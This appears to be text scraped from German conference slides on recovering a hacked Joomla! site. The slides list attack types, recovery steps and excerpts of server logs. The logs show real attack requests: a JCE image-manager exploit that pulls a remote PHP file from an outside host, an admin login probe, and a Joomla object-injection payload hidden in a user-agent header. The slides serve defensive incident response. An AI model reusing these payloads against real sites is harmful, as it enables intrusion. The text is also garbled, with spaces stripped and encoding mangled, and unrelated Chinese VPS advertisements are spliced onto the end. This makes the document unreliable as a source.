MickieQuick-https://www.
flickr.
com/photos/mickie/1174280743Joomla!
wurdegehackt!
WasmussichtunbermichChristianSchmidt32JahreJoomla!
UserGroupMünchen-GründerJoomla-Security.
de-GründerThemenArtenvonHacksVorgehensweiseHackfindenundbehebenZukünftigeAngriffeabwehrenOffeneFragenundAntwortrundeArtenvonHacksEirikSolheim-https://www.
flickr.
com/photos/eirikso/2217292002/UnzhligvieleArten:DDoS,RemoteCodeExecution,CrossSiteRequestForgrery,SocialEngineering,DNSCachePoisoning,Session&AuthenticationAttack,CrossSiteScripting,Defacemand,Injection,usw.
VorgehensweiseGrundstzlicheAnleitung:1.
WebsitevomNetznehmen2.
EinbruchuntersuchenundLückefinden3.
PasswrterndernundBackupwiederherstellen4.
Lückenschlieen,Seitewiederfreigeben5.
WebsitegegenAngriffeabsichernhttps://www.
joomla-security.
de/joomla-gehackt-was-tun.
htmlHackfindenundbehebenHackfindenundbehebenHackfindenundbehebenHackfindenundbeheben157.
55.
34.
x--[05/Jan/2014:20:15:03+0100]"GET/de/component/search/searchword=heizger\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xc2\xa0\xc3\x83\xc2\xa2\xc3\xa2\xe2\x80\x9a\xc2\xac\xc3\xa2\xe2\x80\x9e\xc2\xa2\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xc2\xa2\xc3\xa2\xe2\x80\x9a\xc2\xac\xc3\x82\xc2\xa0\xc3\x83\xc6\x92\xc3\x82\xc2\xa2\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xbe\xc3\x82\xc2\xa2\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\xa2\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xe2\x80\xa6\xc3\x82\xc2\xa1\xc3\x83\xc6\x92\xc3\x86\xe2\x80\x99\xc3\x83\xc2\xa2\xc3\xa2\xe2\x80\x9a\xc2\xac\xc3\x85\xc2\xa1\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xa4teHTTP/1.
1"20081111www.
xxx.
de"-""Mozilla/5.
0(compatible;bingbot/2.
0;+http://www.
bing.
com/bingbot.
htm)""-"194.
150.
113.
x--[05/Jan/2014:21:00:40+0100]"GET/en/option=com_content&view=article&id=366&Itemid=452&sa=U&ei=kK3JUsWPE86T0QXKxYB4&ved=0CJkBEBYwGA&usg=AFQjCNHlFOPR682oWJYyC48XF93qq2HLtQ//index.
phpoption=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20src=http://ventaspor.
com/wp-includes/php/update.
phpHTTP/1.
1"20079814www.
xxx.
de"-""Mozilla/5.
0(WindowsNT5.
1)AppleWebKit/537.
22(KHTML,likeGecko)Chrome/25.
0.
1364.
160Safari/537.
22""-"95.
163.
75.
x--[05/Jan/2014:21:04:32+0100]"GET/administrator/index.
phpHTTP/1.
0"2004437xxx.
net"-""Opera/9.
80(WindowsNT6.
1;U;ru)Presto/2.
8.
131Version/11.
10""-"95.
163.
75.
x--[05/Jan/2014:21:04:33+0100]"POST/administrator/index.
phpHTTP/1.
0"200125xxx.
net"http://xxx.
net/administrator/index.
php""Opera/9.
80(WindowsNT6.
1;U;ru)Presto/2.
8.
131Version/11.
10""-"74.
3.
170.
33/CAN/Alberta74.
3.
170.
33––[12/Dec/2015:16:49:40-0500]"GET/contact/HTTP/1.
1"4035322"http://google.
com/""}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:.
.
{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:.
.
关于HostYun主机商在之前也有几次分享,这个前身是我们可能熟悉的小众的HostShare商家,主要就是提供廉价主机,那时候官方还声称选择这个品牌的机器不要用于正式生产项目,如今这个品牌重新转变成Hostyun。目前提供的VPS主机包括KVM和XEN架构,数据中心可选日本、韩国、香港和美国的多个地区机房,电信双程CN2 GIA线路,香港和日本机房,均为国内直连线路,访问质量不错。今天和大家分享下...
LOCVPS发来了针对元旦新年的促销活动,除了全场VPS主机8折优惠外,针对德国/荷兰KVM #1/美国KVM#2 VPS提供终身7折优惠码(限量50名,先到先得)。LOCVPS是一家成立于2012年的国人VPS服务商,提供中国香港、韩国、美国、日本、新加坡、德国、荷兰、俄罗斯等地区VPS服务器,基于KVM或XEN架构(推荐优先选择KVM),均选择直连或者优化线路,国内延迟低,适合建站或远程办公使...
PhotonVPS 服务商我们是不是已经很久没有见过?曾经也是相当的火爆的,我们中文习惯称作为饭桶VPS主机商。翻看之前的文章,在2015年之前也有较多商家的活动分享的,这几年由于服务商太多,乃至于有一些老牌的服务商都逐渐淡忘。这不有看到PhotonVPS商家发布促销活动。PhotonVPS 商家七月份推出首月半价Linux系统VPS主机,首月低至2.5美元,有洛杉矶、达拉斯、阿什本机房,除提供普...